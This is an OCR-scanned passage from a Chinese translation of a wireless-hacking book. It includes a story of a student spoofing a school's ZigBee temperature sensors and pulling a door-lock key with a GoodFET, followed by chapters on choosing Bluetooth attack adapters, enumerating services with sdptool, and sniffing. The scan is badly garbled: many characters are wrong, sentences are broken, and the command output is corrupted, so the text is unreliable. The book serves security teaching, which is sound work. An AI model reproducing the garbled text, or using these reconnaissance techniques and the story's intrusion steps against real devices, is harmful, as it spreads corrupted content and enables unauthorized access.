后 利用 友 现 的 目标 跨 过 中 间 的 缝 除 连接 到 新 的 受害 者 网 络 上 。 


Microsoft 公 司 的 本 地 Wi-Fi 模 式 在 Windows Vista 和 Windows 7 上 增加 了 超 强 的 功能 ， 这 给 了 开发 人 员 提 供与 无 线 网 络 进 
行 交 互 的 新 能 力 。 它 还 为 攻击 者 利用 受害 者 主机 攻击 远程 无 线 网 络 提供 了 新 的 机 遇 。 通 过 这 种 能 力 ， 即 使 无 线 网 络 在 攻击 者 的 物 
理 履 善 范 围 之 外 ， 也 变 得 可 访问 ， 也 对 这 种 依靠 物理 距离 避免 无 线 连 接 的 组 织 增加 了 威胁 。 


第 三 部 分 ”了 夏 解 其 他 无 线 扩 林 


默 尔 (Merle) 经 党 取得 优秀 的 成 绩 ， 但 是 却 不 能 称 之 为 一 个 优秀 的 学 生 。 比 起 在 历史 课 上 记忆 和 复 诵 日 期 和 名 字 ， 或 者 去 
平衡 另 一 个 化 学 方程 ， 他 通 第 会 在 课堂 上 思考 入 侵 学 校 计 算 机 的 方法 。 


在 获取 了 评分 系统 和 出 勤 记 录 计 算 机 的 权限 后 ， 他 决定 做 一 些 更 深奥 的 事情 。 黑 尔 的 学 校 最 近 打 算 提 高 能 源 的 使 用 效率 。 这 
套 新 系统 最 有 趣 的 部 分 是 那些 小 的 传感器 ， 默 尔 看 到 工程 师 将 它们 安装 在 了 每 个 房间 里 。 他 猜测 传感器 可 能 采用 了 ZigBee 恒 温 
器 。 默 尔 立 刻 收集 所 有 需要 的 硬件 ， 把 一 台 运 行 有 2zbstumblet 的 笔记 本 电脑 带 到 了 学 校 。 


zbstumbletft 上 出 现 了 结果 ， 很 明显 学 校 里 有 许多 ZigBee 接 入 点 。 在 检查 了 zbstumblet 的 结果 之 后 ， 默 尔 分 辨 出 分 别 有 两 种 不 同 
的 网 络 在 运行 加 窗 的 和 明文 的 。 黑 尔 决 定 首先 入 侵 明 文 的 网 络 


在 使 用 zbdump 和 2zbteplay 进 行 简单 测试 后 ， 黑 尔 很 自信 他 找到 了 传感器 用 来 报告 当前 温度 的 数据 包 。 为 了 验证 他 的 理论 ， 他 
立刻 进行 了 一 项 测试 来 验证 得 出 的 结果 。 一 天 他 把 运行 着 zbdump 的 电脑 放 在 双肩 背包 中 ， 将 自己 的 外 衣 悬 挂 在 传感器 上 。 这 会 
导致 温度 上 升 几 度 ， 这 样 就 能 够 验证 他 的 数据 包 捕 获 理论 。 在 快速 地 浏览 了 捕获 的 数据 后 ， 他 的 理论 得 到 验证 。 默 尔 现在 知道 了 
用 来 传递 温度 的 数据 包 的 格式 。 


根据 这 些 信息 ， 黑 尔 可 以 告诉 主 HVAC 控 制 器 任意 房间 的 温度 。 通 过 告知 控制 器 房间 内 的 温度 为 90C (或 者 只 有 40C ) ， 


尔 可 以 影响 控制 器 对 楼 宇内 进行 取暖 或 者 制冷 。 


在 能 够 随心 所 谷地 控制 他 所 在 教室 的 温度 后 ， 默 尔 想 对 学 校 开 一 个 小 小 的 玩笑 ， 他 很 好 奇 ， 如 果 所 有 房间 的 温度 突然 报告 为 
120 C 时 会 发 生 什 么 情况 。 新 的 HVAC 系 统 有 没有 配套 安装 一 个 火灾 控制 系统 呢 ? 黑 尔 想 尝 试 创 造 电 影 《Hacket》 中 一 个 著名 的 


救火 场景 ， 但 是 他 最 终 放 弄 了 这 个 想法 。 


在 牢 牢 地 控制 了 温度 传感器 之 后 ， 默 尔 将 他 的 注意 力 转移 到 了 加 密 的 网 络 上 。 他 一 直 都 弄 不 明白 其 中 的 原理 ， 直 到 有 一 天 他 
看 到 技术 员 在 一 些 管理 员 的 门 上 安装 了 新 锁 。 默 尔 迅 速 地 抓 住 了 这 个 机 会 ， 营 上 一 些 无 关 紧要 的 控诉 将 自己 送 到 了 校长 办 公 室 ， 
在 等 待 训 诚 的 时 候 偷 取 了 其 中 的 一 把 门 锁 。 


就 如 麦 金 妮 (McKinney) 女士 完成 她 的 文 名 分 析 任 务 一 样 ， 一 周 的 休学 时 间 给 了 他 绝 佳 的 机 会 来 熟悉 硬件 调试 。 没 过 多 
久 ， 默 尔 就 发 现 了 门 锁 内 使 用 的 芯片 ， 并 且 将 他 的 GoodFET 挂 钓 到 了 调试 针脚 上 。 在 扫除 了 这 个 障碍 之 后 ， 他 开始 抓 取 设 备 的 
flash 和 RAM。 由 于 芯片 内 的 RAM 只 有 8KB 大 小 ， 他 开始 尝试 在 RAM 中 暴力 获取 密 钥 ， 这 能 够 帮助 他 解密 zbgoodfind 捕 获 的 数据 
包 。 在 成 功 之 后 ， 他 就 拥有 了 和 学 校 安 全 门 上 的 锁 进 行 交 互 的 凭证 。 


在 有 了 新 发 现 的 能 力 之 后 ， 默 尔 发 现 上 自己 处 在 一 个 从 没有 过 的 位 置 


段 切 地 期 望 休学 尽快 结束 ， 这 样 他 又 能 重 返 校园 了 。 


第 8 重 ” 监 直 扫 摘 和 侦 测 


与 任何 成 功 的 入 侵 一 样 ， 攻 击 的 步骤 包括 了 解 目标 背后 涉及 的 技术 ， 扫 描 和 侦 测 分 析 ， 最 后 是 攻击 和 漏洞 利用 。 在 本 章 中 ， 
我 们 将 会 讲解 蓝牙 规范 的 核心 概念 ， 随 后 介绍 蓝牙 扫描 和 侦 测 的 工具 和 技术 。 本 章 涉及 寻找 一 个 性 能 优良 的 蓝牙 适配器 (还 有 一 
个 好 的 驱动 器 ) ， 多 种 确认 周边 蓝牙 设备 的 方法 ， 在 你 找到 它们 的 时 候 ， 访 问 目标 的 步骤 。 我 们 同样 会 讲解 OS 本 机 利用 技术 ， 
第 三 方 的 蓝牙 扫描 工具 ， 移 动 平台 的 工具 ， 使 用 通用 软件 无 线 电 外 设 (Universal Software Radio Peripheral，USPR) ”( 它 来 
自 Ettus 研 究 院 ) 的 高 级 技巧 。 


8.1” 蓝 才 技术 概述 


本 刷 的 目标 是 在 一 个 较 高 的 层次 描述 蓝牙 设备 之 间 的 相互 作用 ， 不 会 涉及 底层 协议 的 重要 知识 。 我 们 同样 会 讲解 一 些 基 本 的 
概念 ， 比 如 : 设备 友 现 、 跳 频 和 极 微 网 。 


提示 。 有关 蓝 和 牙 规范 细节 的 详细 介绍 可 以 从 本 书 的 配套 网 站 http://www.hackingexposed wireless.com 上 得 到 。 


蓝牙 规范 在 2.4GHz 的 ISM 波 段 上 定义 了 79 个 信道 ， 每 个 信道 有 1MHz 宽 。 设 备 在 这 些 信道 中 以 每 秒 1600 次 的 《每 微 秒 625 
次 ) 频率 进行 跳 转 。 这 项 信道 跳 转 技术 称 为 跳 频 扩 频 (Frequency Hopping Spread Spectrum，FHSS) ， 在 当前 的 蓝牙 设备 
中 ， 用 户 最 大 可 以 获得 3Mbps 的 带宽 ， 最 大 约 为 100 米 的 传输 距离 。FHSS 通 过 快速 地 在 RF 频谱 中 移动 ， 针 对 噪声 信道 为 通信 提 
供 鲁 棒 性 。 


任何 想 通 过 蓝牙 进行 无 线 通 信 的 设备 的 设置 ， 需 要 同一 时 间 在 同一 信道 内 ， 如 下 图 所 示 。 通 过 协调 的 方式 进行 跳 频 的 设备 可 
以 相互 进行 通信 ， 它 们 组 成 了 赣 牙 极 微 网 ， 它 是 两 个 或 者 多 个 监 牙 设 备 之 间 使 用 的 基本 网 络 模型 。 每 个 极 微 网 部 有 一 个 主 设备 和 
7 个 从 设备 。 极 微 网 中 的 通信 是 严格 地 在 一 个 从 设备 和 一 个 主 设备 之 间 进 行 的 。 极 微 网 中 使 用 的 信道 跳跃 的 顺序 是 伪 随 机 性 的 ， 
它 只 能 通过 主 设备 的 地 址 和 时 钟 产 生 。 


8.2 ”准备 一 次 攻击 


人 花费 一 些 时 间 为 蓝牙 攻击 做 一 些 预先 的 准备 工作 ， 你 会 从 这 个 实用 的 系统 中 获得 不 少 好 处 。 在 本 节 中 ， 我 们 会 针对 选择 监 牙 
攻击 设备 提供 一 些 指 南 ， 讲 解 一 些 技 巧 以 扩展 设备 的 使 用 荡 围 。 


选择 蓝牙 攻击 设备 


在 准备 你 的 监 牙 工 具 箱 时 ， 首 先 最 重要 的 决定 是 选择 一 个 监 牙 接口 ， 通 过 它 来 友 起 攻击 。 这 个 决定 可 能 看 起 来 有 些微 不 足 
道 ， 选 择 任何 老 的 蓝牙 接口 ， 插 上 它们 ， 你 的 起 步 会 非常 顺利 。 尽 管 这 个 方法 可 能 与 实验 军 环 境 很 类 似 (如 果 你 足够 六 运 的 
话 ) ， 但 在 你 攻击 现实 目标 的 时 候 ， 你 会 有 一 种 完全 不 同 的 感 沈 。 


监 牙 接口 功率 等 级 


在 生产 监 牙 接口 的 时 候 ， 监 牙 规范 为 生产 商定 义 了 3 种 功率 等 级 。 通 过 确认 传输 器 的 最 大 输出 功率 ， 这 些 等 级 影响 着 蓝牙 拉 
术 的 效率 。 举 例 来 说 ， 蓝 牙 耳 机 设备 的 通信 距离 并 不 会 太 长 ， 因 为 它 一 般 与 用 户口 袋 中 或 者 束 近 桌子 上 的 电话 进行 配对 。 


要 让 耳机 的 电池 友 挥 最 好 的 功效 ， 你 不 应 该 让 设备 在 超出 最 大 传输 距离 的 沁 围 内 进行 工作 ， 所 以 大 部 分 的 赣 牙 耳机 都 会 在 无 
线 接口 中 采用 中 等 的 输出 功率 。 


要 满足 不 同 的 赣 牙 设备 ， 蓝 牙 技术 联盟 定义 了 3 种 不 同 的 功率 等 级 ,范围 从 1~100mW。 功 率 等 级 根据 连接 到 蓝牙 接口 天 线 
上 的 输出 进行 测量 ， 有 效 的 范围 如 表 8-1 所 示 。 


监 牙 开 友 者 会 选择 不 同 的 监 牙 射 频传 输 输 出 功率 来 满足 他 们 特定 的 程序 要 求 ， 而 攻击 者 可 能 会 选择 最 大 的 传输 功率 来 获得 最 
大 的 攻击 学 围 。 第 一 级 设备 的 传输 功率 是 100mW， 它 覆盖 的 范围 和 Wi-Fi 设 备 相 似 ， 通 过 配备 额外 的 天 线 还 可 以 增加 它 的 覆盖 
汽 围 。 幸 运 的 是 ， 销 售 团队 意识 到了 这 个 商机 ， 所 以 他 们 会 在 产品 的 包 六 上 标明 设备 可 以 提供 第 一 级 的 覆 苹 沁 围 。 


对 于 攻击 者 来 说 什么 沁 围 并 不 是 最 理想 的 


在 某 些 情况 下 ， 能 够 提供 最 大 禾 盖 范围 的 蓝牙 接口 并 不 是 我 们 想 要 的 。 举 例 来 说 ， 假 设 你 想 要 建立 一 个 蓝牙 攻击 实验 室 ， 在 
这 个 实验 室 中 ， 你 想 通 过 攻击 目标 蓝牙 设备 来 锻炼 你 的 技能 ， 进 行 研究 或 者 试验 。 如 果 这 个 实验 室 物理 上 靠近 目标 蓝牙 设备 ， 但 
是 却 不 在 你 测试 的 范围 之 内 ， 你 可 能 会 不 经 意 间 扰乱 其 至 攻击 了 未 被 授权 的 设备 。 同 样 ， 蓝 和 牙 在 2.4GHz 的 波段 中 使 用 了 跳 频 技 
术 ， 一 个 高 功率 的 适配器 可 能 会 与 许多 Wi-Fi 设 备 进行 交互 ， 这 会 导致 其 他 的 传输 器 占用 拥挤 的 波段 。 


如 果 你 所 在 的 机 构 遇 到 了 上 述 问 题 ， 那 么 使 用 第 二 级 的 蓝牙 耳机 来 限制 蓝牙 的 活动 力 可 能 是 最 好 的 选择 。 如 果 缩 小 了 范围 而 
问题 仍然 存在 的 话 ， 那 么 把 射频 阻 断 设备 当做 法 拉 第 笼 吧 。 


扩展 监 牙 沁 围 


能 够 扩展 有 效 的 通信 汽 围 对 于 蓝牙 攻击 接口 来 说 是 非常 重要 的 属性 。 通 常 攻击 者 会 选择 第 一 级 的 耳机 ， 它 的 传输 能 力 有 
100mW， 尽 管 在 没有 干扰 的 情况 下 ， 它 能 够 拥有 100 米 的 传输 沁 围 ， 但 是 我 们 还 是 可 以 期 待 它 能 有 更 好 的 性 能 。 要 实现 更 大 的 
覆 重光 围 ， 你 可 以 使 用 定向 天 线 来 指定 蓝牙 攻击 接口 的 射频 辐射 模式 。 


表 8-1 蓝牙 接口 功率 等 级 


功率 等 级 最 大 输出 功率 预计 范围 


因为 蓝牙 和 IEEE 802.11b 及 802.11g 设 备 一 样 工作 在 2.4GHz 的 波段 中 ， 所 以 有 很 多 天 线 种 类 可 供 选 择 。 你 可 以 从 
A 它们 的 售 
价 在 25~ 140 美 


商业 上 使 用 的 蓝牙 适配器 种 类 束 比 较 有 限 了 ， 它 们 自 带 有 外 接 的 天 线 接口 ， 专 门 应 用 于 工业 程序 上 。 其 中 的 一 个 产品 是 
SENA Parani UD-100 适 配器 ， 它 拥有 反 级 天 线 连接 器 ， 只 有 在 http://www.sena.com 网 站 上 的 认证 零 销 商 才能 够 购买 到 。 在 
编写 本 书 的 时 候 ， 它 的 售 价 是 40 美 元 ， 对 于 基于 心 片 组 和 功率 相对 较 大 的 天 线 连 接 器 的 蓝牙 攻击 接口 来 说 是 很 有 吸引 力 的 ， 如 
上 图 所 示 。 


提示 “通常 你 可 以 使 用 烙铁 和 基本 的 硬件 黑客 技术 对 标准 蓝牙 接口 进行 修改 ， 添 加 额外 的 天 线 连 接 器 。 请 访问 本 书 的 配套 网 
站 http:/ /www.hackingexposedwiteless.com 来 获得 修改 蓝牙 接口 ， 添 加 外 接 天 线 的 技术 指 寻 。 


8.3 ” 侦 碍 


竺 监 牙 攻击 的 侦查 阶段 ， 使 用 目 视 检查 和 混合 友 现 ， 我 们 会 讲解 通过 主动 友 现 和 被动 友 现 来 确定 区 域内 的 目标 监 牙 设备 。 侦 
查 过 程 的 目标 是 确认 监 牙 设备 是 否 仔 企 ， 寻 找到 每 个 设备 的 48 位 MAC 地 址 或 者 是 监 牙 地 址 (BD_ADDR) 。 


一 旦 发 现 了 设备 ， 可 以 开始 枚 举 设备 上 所 使 用 的 服务 ， 确 认可 能 的 可 以 利用 的 目标 。 还 可 以 辨别 远程 设备 ， 使 用 蓝牙 咱 探 工 
具 从 极 微 网 中 获取 数据 。 下 面 我 们 就 详细 讲解 这 些 步骤 


8.4 ”服务 枚 举 


蓝牙 S16 定义 了 服务 友 现 协议 (Service Discovery Protocol，SDP) ， 目 的 是 确认 或 者 公布 蓝牙 设备 上 的 可 用 服务 。 这 项 协 


议 可 以 满足 蓝牙 网 络 的 一 些 特定 要 求 ， 包 括 通 过 功能 、 类 型 或 者 其 他 属性 ， 包 括 可 用 功能 或 者 规范 枚 举 远 程 设备 上 的 服务 。 当 蓝 


牙 开 友 者 在 设备 上 实现 蓝牙 栈 时 ， 他 必须 首先 通过 服务 友 现 协议 ， 确 定 远 程 设 备 上 使 用 的 是 哪 种 服务 。 从 攻击 者 角度 来 说 ，SDP 
允许 你 确认 主机 上 的 可 能 的 攻击 目标 ， 获 取 连 接 主 机 需要 的 蓝牙 规范 和 详细 的 配置 信息 。 


会 ”使 用 sdptool 要 举 服务 


我 们 之 前 介绍 的 多 种 数据 发 现 工具 都 可 以 枚 举 和 显示 SDP 记 录 信 息 。 这 听 起 来 十 分 方便 ， 但 是 却 有 下 面 的 限制 : 


-它们 只 能 用 来 攻击 可 发 现 模 式 的 主机 ， 对 于 通过 其 他 方式 确认 的 不 可 发 现 模 式 下 的 主机 ， 它 们 并 不 能 显示 SDP 信 息 


忆 Mo 


“SDP 记录 数据 被 汇总 为 主要 规范 格式 ， 并 不 会 显示 连接 主机 所 需 的 必要 细节 。 


: 设备 枚 举 可 能 不 会 显示 目标 设备 上 可 用 但 是 未 知 的 服务 。 


可 以 使 用 Linux 命 令 sdptool| 获 得 目标 设备 上 的 服务 。 这 个 工具 没有 图 形 界面 ， 所 以 在 检查 结果 的 时 候 看 起 来 会 很 吃力 ， 但 


它 却 是 最 全 面 的 设备 发 现 工 具 。 在 本 例 中 ， 我 们 使 用 sdptool 确 认 运 行 在 Windows Vista 系 统 上 的 本 地 蓝牙 栈 所 提供 的 服务 。 
$ sudo sdptool browse 00:0a:94:01:93:c3 
Browsing O00:0A:94:01:93:C3 


Service Name: Service Dilscovery 
Service Description: Publishes 


Service Provider: Microsoft 
Servyvice RecHandle: OxU 
Service Class ID List: 
SDP Server™ (0x1l000 
Protocol Descriptor Li1ist 
TL2CAP™ (0x0100 
PSM: 
"SDP™ (Ox0001) 


Language Base Attr List: 
code IS0639: Ux6Jb6e 


encodling: Jxoa 

base offset: Oxl00 
Service Name: Personal Ad Hoc 
SeEILVice i Personal 
Service RecHandle: Oxl0000 
Service Class ID List: 


"PAN User™ 
Pro 


(Vxl1]112) 
tocol Descriptor List 
“LeCAP™ (Vx0100) 

PSM: 1 
“BNEP™” (0x000I) 


Version: 


En 
TT 
二 时 


base offset: 
Protfti 
TPAN User™ 


(0x1115) 


Version: Ox0100 


提示 


对 任意 


即使 没有 完 


整 的 蓝牙 地 址 信息 ， 你 也 可 以 使 用 sdptool 命 
带 有 NAP 的 请 求 做 出 回应 ， 这 样 就 可 以 使 用 Bluape 的 结果 进 


SerIVvices 


从 输出 结果 中 可 以 看 到 ，Windows Vista 系 统 上 运行 着 两 个 服务 。 第 一 个 服务 


应 。 第 二 个 服务 稍微 有 点 复杂 ， 下 面 我 们 来 更 详细 地 检查 结 


Service Name (服务 名 称 ) 和 Service Description (服务 描述 ) 字段 由 实现 服务 器 的 开 友 者 提供 


。 在 用 户 确认 一 台 可 及 现 主 机 或 者 操作 系统 显示 一 份 可 用 服务 列表 时 ， 


似 的 服务 可 能 会 互 不 协调 ) 
认 数 据 。 


SerVvice 


令 枚 举 服务 。 必 须 指定 正确 的 LAP 和 UAP 信 息 
于 设备 枚 举 扫 描 。 


(因此 在 多 


是 SDP 协 议 本 身 ， 它 对 设备 枚 举 请 求 做 出 回 


SS， 目 标 主 机 可 从 


台 主 机 上 ， 类 
大 部 分 的 用 户 都 会 看 到 这 尝 确 


Service RecHandle 表 示 了 与 服务 相关 的 SDP 服 务 记 录 句 柄 。 这 是 一 个 32 位 值 ， 在 特定 主机 上 ， 它 是 服务 的 唯一 标识 。 在 特 
定 的 主机 上 会 使 用 唯一 的 服务 记录 句柄， 在 多 台 主 机 之 间 也 可 能 互 不 相同 。 通 常 来 讲 ， 蓝 牙 设备 对 于 特定 的 服务 会 使 用 特定 的 服 
务 记 录 句 柄 (比如 Microsoft 本 地 蓝牙 栈 通 常 为 个 人 点 对 点 用 户 服 务 分 配 0x10000) 。 


Service Class ID List (服务 类 型 ID 列表 ) 数据 表示 服务 所 采用 的 监 牙 规范 。 在 本 例 中 ，PAN User (个 人 局 域 网 用 户 ) 规范 
(也 称 为 PANU) 和 一 个 数字 形式 的 标识 符 表 示 它 是 由 蓝牙 S1G 实 施 的 。 个 人 局 域 网 用 户 规范 作为 客户 端 ， 与 组 Ad-Hoc 网 络 
(Group Ad-Hoc Network，GN) 或 者 网 络 接 入 点 (Network Access Point，NAP) 服务 器 规范 进行 通信 ， 人 允许 用 户 通过 蓝 

牙 实 现 网 络 访问 (比如 TCP/IP) 。 


提示 详尽 的 蓝牙 规范 信息 可 以 从 Wikipedia 网 页 上 的 “Bluetooth profile 中 获得 ， 它 的 网 址 是 


http:/ /en.wikipedia.org/wiki/Bluetooth_profile。 


-protocol Descriptor List (协议 描述 列表 ) 显示 通过 个 人 局 域 网 用 户 规范 提供 的 蓝牙 服务 支持 哪些 规范 。 在 本 例 中 ， 
使 用 了 L2CAP， 值 为 15 的 协议 服务 多 开关 选择 器 (Protocol Service Multiplexer，PSM) ( 简 而 言 之 束 是 蓝牙 端口 ) ， 还 有 监 
牙 网 络 封 装 协议 (Bluetooth Network Encapsulation Protocol，BNEP) 。L2CAP 和 PSM 的 配置 和 使 用 在 蓝牙 介绍 材料 中 会 
有 更 进一步 的 描述 ， 可 以 从 配套 网 站 http://www.hackingexposedwireless 上 获得 。 


Langnage Base Attr List (语言 库 属 性 列表 ) 显示 服务 中 及 用 的 基本 语言 ， 它 用 来 填充 可 读 字 段 。 对 我 们 来 说 ， 最 感 兴趣 
的 是 code_1SO639 字 段 ， 它 表示 1SO 的 639 号 规范 ， 它 是 双 字 母语 言 名 称 的 标准 。 在 本 例 中 ，0x656e 是 小 写字 母 en 的 ASCII 码 
值 ， 在 ISO 639 中 代表 英语 。 对 于 本 地 操作 系统 和 主机 上 的 所 有 服务 ， 服 务 语言 信息 通常 都 是 固定 的 。 在 尝试 进行 漏洞 利用 时 ， 
这 些 信息 对 你 选择 本 地 语言 包 是 很 有 帮助 的 。 


提示 一 份 以 十 六 进 制 值 方式 表示 的 双 字 母国 家 码 的 修订 版 ISO 639 可 以 从 
http://www.willhackforsushi.com/resources/iso639.txt 上 获得 。 

最 后 ，Profile Descriptor List (规范 描述 列表 ) 显示 设备 使 用 的 是 PAN User， 另 外 还 有 版 本 标识 符 。 

在 前 面 的 例子 中 ， 我 们 指定 sdptool browse 00:0a:94:01:93:c3 参 数 来 获取 SDP 服 务 列表 。 通 过 询问 蓝牙 设备 获取 可 用 服务 


列表 是 一 个 很 好 的 SDP 枚 举 方法 。 然 而 ， 有 些 主机 并 不 会 做 出 那么 友好 的 回应 ， 它 们 会 尝试 阻止 向 目标 设备 港 露 SDP 信 息 。 


# sdptool browse 00:1D:25:EC:47:86 


1 


Browsing O00:1D:220:EC:47:8¢6 
4 

冬运 的 是 ，sdptool 命 令 包 合 了 一 组 参数 ， 即 使 目标 设备 尝试 隐藏 可 用 的 服务 ， 我 们 也 能 够 进行 SDP 服 务 枚 举 。sdptool 根 
据 单 用 服务 句柄 基数 值 列表 和 各 种 弟 用 的 服务 记录 句柄 值 ， 对 目标 设备 上 的 服务 进行 探测 。 我 们 可 以 用 sdptool records 参 数 实 
现 。 


$s sdptool records 00:1D:25:EC:47:86 
Service Name: A2DP 
Service RecHandle: OQxl0000 
Service Class ID List: 
"TAUudico Source™ (0xl110a) 
Protocol Descriptor Lirst: 
Dx0100) 


FT "A TT 
J AC 


( 
PSM: 25 


"AVDTP" (0x0019) 


uintl6e: Oxl00 
Profile Descriptor List: 
"Advanced Audio™ (Vxl10d) 


Version: 0x0100 


Service Name: Active Sync Bluetooth Service 


SeErvice RecHandle: Oxl0001 


注意 在 编写 本 书 的 时 候 ， 最 新 版 本 的 sdptool (BlueZ 4.47) 在 指定 sdqtool records 参 数 的 情况 下 ， 会 为 每 个 目标 查询 384 个 服 
务 记录 和 句柄 值 。 


提示 ”sdptool records 和 sdptool 结 果 都 只 能 以 树 形 格式 显示 (默认 选项 ， 在 本 例 中 使 用 ) 或 者 在 records 或 者 browse 关 键 字 后 加 
上 --xml 参 数 以 XML 的 形式 输出 。 把 结果 导入 其 他 程序 后 ，sdptool 可 以 通过 标准 数据 编码 与 复杂 的 分 析 机 制 进行 交互 。 
加 防御 设备 枚 举 


防御 设备 枚 举 是 一 项 艰巨 的 任务 。 在 与 其 他 设备 进行 连接 时 ， 蓝 牙 设 备 需 要 用 服务 信息 做 出 回应 ， 其 中 就 包括 了 RFCOM M 
端口 、PSM 和 语言 包 之 类 的 服务 信息 。 


一 个 推荐 的 方法 是 将 赣 牙 设备 置 于 不 可 友 现 模式 。 在 不 能 确定 蓝牙 地 址 的 情况 下 ， 攻 击 者 也 无 法 从 目标 设备 获得 SDP 记 录 。 
但 是 ， 残 像 我 们 之 前 看 到 的 ， 如 果 攻 击 者 使 用 正确 的 工具 ， 这 只 能 使 确认 蓝牙 地 址 变 得 更 困难 一 些 ， 并 不 能 阻止 他 们 获得 完整 的 
蓝牙 地 址 。 


防止 SDP 信 息 泄露 的 最 好 方法 是 只 开放 主机 上 所 需要 的 服务 。 通 过 禁止 不 使 用 的 规范 ， 攻 击 者 束 只 能 获得 更 少 的 SDP 信 息 ， 
从 而 减少 了 目标 设备 上 可 能 被 攻击 利用 的 接口 。 不 能 禁用 你 所 需 服务 的 SDP， 但 是 ， 如 果 确 实 有 不 需要 运行 的 服务 ， 可 以 使 用 蓝 
牙 的 最 低 权限 进行 配置 : 禁止 所 有 你 用 不 到 的 服务 。 


不 幸 的 是 ， 这 项 拉 术 通常 都 是 不 可 能 做 到 的 ， 因 为 许多 监 牙 设备 都 不 允许 终 疡 用 尸 指 定 支 持 哪些 设备 。 在 这 些 情 况 下 ， 剩 下 
的 方法 是 知道 设备 的 暴露 是 通过 SDP 信 息 造 成 的 。 


8.5 ”本章 小 结 


本 章 介 绍 了 监 牙 规 沁 、 选 择 和 准备 蓝牙 攻击 接口 的 技巧 。 一 旦 建立 好 了 监 牙 攻击 接口 ， 束 可 以 使 用 许多 工具 确认 区 域内 的 监 
牙 设备 (可 友 现 模式 以 及 不 可 发 现 模式 ) 。 在 蓝牙 分 析 中 这 是 很 常见 的 方式 ， 但 是 用 户 会 将 蓝牙 适配器 置 于 不 可 发 现 模 式 来 对 攻 
击 进行 阻 找 。 


在 这 种 情况 下 ， 攻 击 者 仍然 可 以 使 用 高 级 的 硬件 和 软件 进行 确认 ， 包 括 Cisco Spectrum Expert (频谱 专家 ) 、gr- 
bluetooth 和 Bluape。 一 旦 攻击 者 得 到 了 完整 的 监 牙 地 址 ， 他 残 可 开始 进行 服务 枚 举 ， 通 过 SDP 在 目标 上 进行 扫 摘 。 


尽管 ， 本 章 介 绍 了 一 些 防御 方法 (比如 将 设备 置 于 不 可 发 现 模式 下 ) ， 但 是 ， 在 监 牙 攻击 中 ， 对 于 那些 拥有 足够 耐心 和 资源 
购买 昂贵 硬件 工具 (比如 ，Cisco Spectrum Expert (频谱 专家 ) 和 USRP) 的 攻击 者 来 说 起 不 到 什么 阻碍 作用 。 第 9 章 继续 讲解 
监 牙 技术 ， 根 据 我 们 在 扫描 和 侦查 阶段 收集 到 的 信息 攻击 蓝牙 设备 。 


第 9 和 章 ” 监 才 视 听 


无 线 网 络 中 最 具 危 险 的 因素 之 一 是 攻击 者 能 够 从 主动 数据 交换 中 被 动 地 收集 通信 数据 包 ， 对 于 蓝牙 同样 也 是 如 此 。 赣 牙 不 像 
Wi-Fi 和 其 他 无 线 标准 那样 拥有 类 似 的 物理 层 特性 ， 所 以 有 多 种 原因 导致 攻击 者 很 难 捕 获 到 蓝牙 通信 数据 包 。 


首先 ， 蓝 牙 米 用 的 是 跳 频 扩 频 (Frequency-Hopping Spread Spectrum，FHSS) 技术 ,传输 器 和 接收 器 使 用 相同 的 频率 
模式 进行 数据 交换 。 对 于 每 一 个 极 微 网 ， 频 率 模 式 都 是 基于 蓝牙 主 设备 的 蓝牙 地 址 ， 所 以 它们 都 是 互 不 相同 的 。 跳 频 的 频率 是 每 
秒 1600 跳 (在 正常 情况 下 ) ， 在 切换 到 其 他 频率 之 前 ， 监 牙 设备 会 在 很 短 的 一 段 时 间 内 传输 和 接收 数据 ( 称 之 为 间 际 ) 。 在 大 
多 数 情况 下 ， 都 需要 极 微 网 主 设备 的 蓝牙 地 址 与 其 他 设备 进行 通信 。 


其 次 ， 要 与 极 微风 内 的 其 他 设备 进行 跳 频 ， 只 有 蓝牙 地 址 是 不 够 的 。 我 们 还 必须 知道 跳 频 模式 ， 同 样 窃听 器 也 必须 了 解 给 定 
时 间 内 设备 的 跳 频 模式 。 监 牙 规范 及 用 主 时 钟 或 CLK 跟 路 设备 位 于 信道 集合 中 的 时 序 。 这 个 值 与 天 数 没 有 关系 ， 它 是 一 个 28 位 的 
值 ， 每 312.5 微 秒 增加 1。 


最 后 ， 蓝 牙 接口 并 不 是 为 被 动 窃听 这 个 目标 设计 的 。 蓝 牙 接口 没有 Wi-F 廖 b 样 的 监控 模式 ， 所 以 它 不 能 够 进行 本 地 穷 听 以 及 
在 基 市 层 显示 网 络 信 号 。 可 以 使 用 像 hcidump 这 样 的 Linux 工 具 在 本 地 进行 穷 听 ， 但 是 这 种 类 型 的 穷 听 并 不 会 显示 低层 信息 或 者 
言 号 ， 它 需要 与 极 微 网 进行 连接 ， 只 能 够 显示 本 地 系统 的 流量 (可 以 把 它 看 做 是 一 个 非 混杂 模式 下 的 穷 听 器 ， 它 只 能 显示 会 话 层 
的 信息 ) 。 


除了 这 些 原 因 之 外 ， 蓝 牙 穷 听 是 一 个 很 有 价值 的 话题 (不 论 是 从 安全 角度 、 开 发 角度 ， 还 是 工程 角度 ) ， 所 以 人 们 设计 了 一 
些 项 目 来 克服 这 些 困难 。 


9.1 ” 丙 业 监 牙 历 听 工具 


商业 蓝牙 窃听 工具 的 种 类 很 少 ， 它 们 通常 价格 不 非 ， 只 有 那些 需要 对 蓝牙 产品 配置 进行 排 障 的 蓝牙 开发 者 才 会 使 用 它们 。 尽 
管 这 些 产 品 面向 的 消费 者 都 是 开发 工程 师 而 不 是 攻击 者 ， 但 我 们 还 是 可 以 使 用 这 些 工具 的 一 些 弟 用 功能 对 蓝牙 网 络 进 行窃 听 。 


四 ”FTS4BT 富 听 器 


+ 


Frontline 测 试 设备 (Frontline Test Equipment，FTE) 公司 生产 各 种 基于 个 人 电脑 的 协议 分 析 器 。FTE 向 系统 集成 商 、 开 
发 者 、 排 障 工程 师 销售 硬件 和 相应 的 软件 ， 使 用 它们 可 以 窃听 和 分 析 3SCADA、RS-232、 以 太 网 、ZigBee、 赣 牙 技术 。 蓝 牙 窃 听 
器 的 型 号 是 FTS4BT， 通 过 FTS4BT 蓝 牙 CompProbe 接 口 和 FTS4BT AirSniffer 软 件 ， 开 发 者 可 以 观察 和 记录 活动 微 网 中 的 流量 情 
况 。 除 了 可 以 在 HCI 层 捕获 通信 数据 包 外 ， 用 户 还 可 以 通过 FTS4BT 访 问 链 路 管理 协议 (Link Management Protocol，LMP) 
数据 以 及 部 分 基 审 (第 二 层 ) 头 数 据 (但 是 ，FTS4BT 无 法 捕获 类 似 于 报头 错误 修正 (Header Error Correction，HEC) 这 样 的 
字段 ) 。 


